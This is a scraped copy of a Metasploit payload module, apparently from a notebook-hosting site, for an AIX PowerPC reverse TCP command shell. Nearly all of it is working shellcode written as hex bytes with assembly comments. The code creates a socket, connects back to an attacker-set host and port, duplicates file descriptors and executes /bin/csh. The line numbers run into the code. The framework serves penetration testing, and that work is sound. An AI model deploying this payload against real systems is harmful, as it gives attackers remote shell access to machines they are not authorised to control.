Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb
Views: 11779
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 204910include Msf::Payload::Single11include Msf::Payload::Aix12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'AIX Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'aix',21'Arch' => ARCH_PPC,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' =>25{26'Offsets' =>27{28'LHOST' => [ 32, 'ADDR' ],29'LPORT' => [ 30, 'n' ],30},31}32))3334end3536def generate(*args)37super(*args)3839payload =40"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #41"\x40\x82\xff\xfd" + # bnel <cntsockcode> #42"\x7f\xc8\x02\xa6" + # mflr r30 #43"\x3b\xde\x01\xff" + # cal r30,511(r30) #44"\x3b\xde\xfe\x25" + # cal r30,-475(r30) #45"\x7f\xc9\x03\xa6" + # mtctr r30 #46"\x4e\x80\x04\x20" + # bctr #47"\xff\x02\x11\x5c" + # .long 0xff02115c #48"\x7f\x00\x00\x01" + # .long 0x7f000001 #49"\x4c\xc6\x33\x42" + # crorc 6,6,6 #50"\x44\xff\xff\x02" + # svca 0 #51"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #52"\x3b\xa0\x07\xff" + # lil r29,2047 #53"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #54"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #55@cal_socket +56"\x7f\xc9\x03\xa6" + # mtctr r30 #57"\x4e\x80\x04\x21" + # bctrl #58"\x7c\x7c\x1b\x78" + # mr r28,r3 #59"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #60"\x38\x9e\xff\xf8" + # cal r4,-8(r30) #61@cal_connect +62"\x7f\xc9\x03\xa6" + # mtctr r30 #63"\x4e\x80\x04\x21" + # bctrl #64"\x3b\x7d\xf8\x03" + # cal r27,-2045(r29) #65"\x7f\x63\xdb\x78" + # mr r3,r27 #66@cal_close +67"\x7f\xc9\x03\xa6" + # mtctr r30 #68"\x4e\x80\x04\x21" + # bctrl #69"\x7f\x65\xdb\x78" + # mr r5,r27 #70"\x7c\x84\x22\x78" + # xor r4,r4,r4 #71"\x7f\x83\xe3\x78" + # mr r3,r28 #72@cal_kfcntl +73"\x7f\xc9\x03\xa6" + # mtctr r30 #74"\x4e\x80\x04\x21" + # bctrl #75"\x37\x7b\xff\xff" + # ai. r27,r27,-1 #76"\x40\x80\xff\xd4" + # bge <cntsockcode+100> #77"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #78"\x40\x82\xff\xfd" + # bnel <cntsockcode+148> #79"\x7f\x08\x02\xa6" + # mflr r24 #80"\x3b\x18\x01\xff" + # cal r24,511(r24) #81"\x38\x78\xfe\x29" + # cal r3,-471(r24) #82"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #83"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #84"\x94\x61\xff\xfc" + # stu r3,-4(r1) #85"\x7c\x24\x0b\x78" + # mr r4,r1 #86@cal_execve +87"\x7f\xc9\x03\xa6" + # mtctr r30 #88"\x4e\x80\x04\x21" + # bctrl #89"/bin/csh"9091# If the payload is generated and there are offsets to substitute,92# do that now.93if (payload and offsets)94substitute_vars(payload, offsets)95end9697payload98end99end100101102